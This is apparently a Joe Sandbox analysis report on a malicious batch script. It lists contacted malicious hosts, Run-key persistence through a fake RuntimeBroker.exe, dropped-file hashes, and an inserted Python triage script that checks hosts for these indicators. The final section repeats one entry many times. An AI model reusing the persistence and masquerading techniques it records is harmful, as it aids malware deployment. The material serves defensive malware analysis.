https://stackoverflow.com/q/11564914/23354; | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 0000000C.00000002.2209055197.0000028B1CF2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | funcaptcha.ru | European Union | 13335 | CLOUDFLARENETUS | true
45.11.229.96 | strompreis.ru | Germany | 397525 | ALPHAONE-ASUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1488895
Start date and time: 2024-08-06 18:11:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: temp_script.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@21/28@2/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RuntimeBroker.exe, PID 5676 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2200 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: temp_script.bat
Time | Type | Description
12:11:58 | API Interceptor | 90x Sleep call for process: powershell.exe modified
18:12:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker C:\Users\user\AppData\Roaming\RuntimeBroker.exe
18:12:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker C:\Users\user\AppData\Roaming\RuntimeBroker.exe
Joe Sandbox View

Columns: Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 188.114.96.3 (IP)
• Exv453QQIX.exe | malicious | FormBook | www.bzfowe.shop/q0z8/
• XpADYjOsY5.exe | malicious | DCRat, PureLog Stealer, zgRAT | 283743cm.nyashka.top/LinePythonhttpcpuApiFlowerprivatecdn.php
• Narud#U017ebenica 08BIH2024.exe | malicious | FormBook | www.qqkartel88v1.com/md02/?Q0GDHL=SVcP4HZHyROl5&V41t=v/CEznv/hMaH4fwWFhy7ytukhIx2w22qOwaWtBuVPfDrtHo+17oXaaCjpEIIGzDN6UQoQUlMzQ==
• Shipment Files EG240711& EG240712.exe | malicious | FormBook | www.orderdiscountspot.shop/0cdq/
• 1V7IyYBdV7.exe | malicious | DCRat, PureLog Stealer, zgRAT | 411260cm.nyashka.top/SecureCpumultilinuxflowerDatalifeWpdle.php
• 1.exe | malicious | Unknown | www.htdlq.com/bmd.txt
• CNvMbuoe5h.exe | malicious | DCRat, PureLog Stealer, zgRAT | 234671cm.nyashka.top/ProviderphphttppacketProcessorGameBigloadDlePublicprivate.php
• vsKkgKIVLm.exe | malicious | DCRat, PureLog Stealer, zgRAT | 849188cm.nyashka.top/GeoCpulongpollApibigloadBaseasyncTrack.php
• QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | filetransfer.io/data-package/HOdxDWTu/download
• 6ddrUd6iQo.exe | malicious | FormBook | www.hpo0snermcvqv.xyz/nxj8/

Match: 45.11.229.96 (IP)
• 4FwNHRnnXb.exe | malicious | PureLog Stealer

Match: strompreis.ru (domain)
• 4FwNHRnnXb.exe | malicious | PureLog Stealer | 45.11.229.96

Match: CLOUDFLARENETUS (ASN)
• http://g31099240595.co/gr | malicious | Unknown | 1.1.1.1
• 445_Settlement_Legal_Transcription.pdf | malicious | HTMLPhisher | 188.114.97.3
• https://grizzlyreports.com/wp-content/uploads/2019/12/Trulieve-Report-.pdf | malicious | Unknown | 188.114.96.3
• RFQ Hail & Ghasha Project.exe | malicious | FormBook | 188.114.97.3
• phish_alert_sp2_2.0.0.0.eml | malicious | HTMLPhisher | 1.1.1.1
• Packing List.exe | malicious | Snake Keylogger | 188.114.97.3
• Upgraded_Detail_PayslipCC886DC7C7E1_pdf.html | malicious | HTMLPhisher | 104.17.25.14
• https://qr-online.pl/go/7327y3pInd6HDYmh | malicious | Unknown | 188.114.96.3
• Import Details.exe | malicious | Snake Keylogger | 188.114.96.3
• Order Details.exe | malicious | Snake Keylogger | 188.114.96.3

Match: ALPHAONE-ASUS (ASN)
• Aqua.mpsl-20240804-2157.elf | malicious | Unknown | 45.13.227.24
• Aqua.arm7-20240804-2157.elf | malicious | Mirai | 45.13.227.24
• Aqua.mips-20240804-2157.elf | malicious | Unknown | 45.13.227.24
• Aqua.x86_64-20240804-2157.elf | malicious | Unknown | 45.13.227.24
• sora.m68k.elf | malicious | Mirai | 38.79.86.219
• ca1b58Nxwf.elf | malicious | Unknown | 45.13.227.201
• GWtByYqyGD.elf | malicious | Unknown | 45.13.227.201
• nWlbyBDOUp.elf | malicious | Unknown | 45.13.227.201
• TIzx8Y748C.elf | malicious | Unknown | 45.13.227.201
• RTPfbe5mRB.elf | malicious | Unknown | 45.13.227.201

Match: 3b5074b1b5d032e5620f69f9f700ff0e
• https://grizzlyreports.com/wp-content/uploads/2019/12/Trulieve-Report-.pdf | malicious | Unknown | 188.114.96.3
• Upgraded_Detail_PayslipCC886DC7C7E1_pdf.html | malicious | HTMLPhisher | 188.114.96.3
• D2MCMOElH7.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
• 34vq3VDWVn.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• ZUpK81URgS.exe | malicious | AgentTesla | 188.114.96.3
• Dw8DmNycf5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
• bFeHdojh20.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• sGQvbGSADU.exe | malicious | AgentTesla | 188.114.96.3
• VLp3BJZN82.exe | malicious | AgentTesla | 188.114.96.3
• SijLVTsunN.exe | malicious | AgentTesla, PureLog Stealer | 188.114.96.3

Match: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe (dropped file)
• 4FwNHRnnXb.exe | malicious | PureLog Stealer

Match: C:\Users\user\AppData\Roaming\RuntimeBroker.exe (dropped file)
• 4FwNHRnnXb.exe | malicious | PureLog Stealer
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 449024
Entropy (8bit): 7.990550406581685
Encrypted: true
SSDEEP: 6144:4hE8FrC1mJDf1nkhf2TO1WGf+CXhJyBl6mVLdWYrS+ZbHegrrHW3JkGYhtoLQvlN:1mHmEOQGZv+Zb33HMYHoLQrdQq
MD5: 7557AF6F3185128C25AEB092DC335975
SHA1: F0866402529BE2FDC0511305DA069B69A8A35B8E
SHA-256: 5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
SHA-512: DE6375E57A674AC063AECD499D8B7FF01EBAAAFB7352CE560A2468293B3D7F7B95A5AC53751728EF0578ADCB5BF0518CE08F55CD7BD3EDD1C13B0A4866301E9B
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:
• Filename: 4FwNHRnnXb.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............+... ........@.. .......................@............@..................................+..O.......t.................... .......+............................................... ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B.................+......H........!...............................................................(....*B(....(....o....*.0..7.......(....t....r...po..........(.....rM..p(..........o....&*..0..|.......s.....(....s.....~.............~....o....&..(....&..s.......o.....o............i(...........,..o......,..o......,..o.......*.(....:.![..........Te..........io......Z .........%.....(....*..( ...*.......*.BSJB............v4.0.30319......l...L...#~......h...#Strings.... ...d...#US.........#GUID.......l...
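The dropped RuntimeBroker.exe above (its SHA-256 is listed in the entry), the RuntimeBroker Run value recorded in the timeline and the two contacted hosts give enough indicators for a host triage pass. The following Python is an added example and not code from the report or from Joe Sandbox: it evaluates constructed host records (autoruns, file and process inventory, DNS and connection logs, Defender exclusions) against those indicators. Because the report flags RuntimeBroker.exe under AppData as a system process name in an unexpected location, it also compares image paths against System32 rather than relying on the hash alone. The record format, field names and rule names are this example's own assumptions; the hash, hosts and Run value name come from the report.

```python
import ntpath
import re

# Indicators taken from this report: SHA-256 of the dropped RuntimeBroker.exe, the two
# contacted hosts, and the Run value name the sample registers. Everything else below
# (host records, field names, rule names) is constructed for this example.
REPORT_IOCS = {
    "sha256": {"5fcee9da2e237df74b7c2619bde63db40c92c2e6c51bd483c86f83dcdfde1eab"},
    "domains": {"funcaptcha.ru", "strompreis.ru"},
    "ips": {"188.114.96.3", "45.11.229.96"},
    "run_value_names": {"runtimebroker"},
}

# Binaries that belong under %SystemRoot%\System32; a copy anywhere else is masquerading
# (the report finds RuntimeBroker.exe under AppData\Roaming and AppData\Local\Temp).
SYSTEM_IMAGE_NAMES = {"runtimebroker.exe", "svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
USER_APPDATA_RX = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)


def norm_path(p: str) -> str:
    """Case-fold and normalise a Windows path (ntpath works on any platform)."""
    return ntpath.normpath(p.strip().strip('"')).lower()


def under_system32(p: str) -> bool:
    return "\\windows\\system32\\" in norm_path(p)


def triage(record: dict) -> list:
    """Return the rule names that fire for one host artefact record."""
    hits = []
    kind = record["type"]
    if kind == "autorun" and "currentversion\\run" in record["key"].lower():
        if record["name"].lower() in REPORT_IOCS["run_value_names"]:
            hits.append("run_value_name_matches_report")
        if USER_APPDATA_RX.match(norm_path(record["image"])):
            hits.append("autorun_image_under_appdata")
    elif kind in ("file", "process"):
        path = norm_path(record["path"])
        if record.get("sha256", "").lower() in REPORT_IOCS["sha256"]:
            hits.append("sha256_matches_dropped_runtimebroker")
        if ntpath.basename(path) in SYSTEM_IMAGE_NAMES and not under_system32(path):
            hits.append("system_image_name_outside_system32")
    elif kind == "dns":
        q = record["query"].lower().rstrip(".")
        if any(q == d or q.endswith("." + d) for d in REPORT_IOCS["domains"]):
            hits.append("dns_query_for_report_domain")
    elif kind == "netconn" and record["dst_ip"] in REPORT_IOCS["ips"]:
        hits.append("connection_to_report_ip")
    elif kind == "defender_exclusion":
        # Add-MpPreference -ExclusionPath on a user-writable directory, as the sample does.
        if USER_APPDATA_RX.match(norm_path(record["path"]) + "\\"):
            hits.append("defender_exclusion_under_appdata")
    return hits


def triage_all(records) -> dict:
    """Map record id -> findings for every record that matched at least one rule."""
    return {r["id"]: h for r in records if (h := triage(r))}


# Constructed host telemetry (not from the report) in the shape a collector might emit.
SAMPLE_HOST_RECORDS = [
    {"id": 1, "type": "autorun", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "RuntimeBroker", "image": r"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"},
    {"id": 2, "type": "file", "path": r"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe",
     "sha256": "5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB"},
    {"id": 3, "type": "process", "path": r"C:\Windows\System32\RuntimeBroker.exe"},  # the real broker
    {"id": 4, "type": "dns", "query": "funcaptcha.ru."},
    {"id": 5, "type": "netconn", "dst_ip": "45.11.229.96"},
    {"id": 6, "type": "defender_exclusion", "path": r"C:\Users\user\AppData\Roaming"},
    {"id": 7, "type": "dns", "query": "ocsp.digicert.com"},
]

if __name__ == "__main__":
    for rid, hits in triage_all(SAMPLE_HOST_RECORDS).items():
        print(rid, hits)
```

Note that the report's own AV column marks strompreis.ru / 45.11.229.96 as not malicious, yet the dropped RuntimeBroker.exe connects to it and Joe Sandbox View ties the same host to another PureLog Stealer sample; the example therefore treats it as an indicator rather than deferring to the reputation verdict.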
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
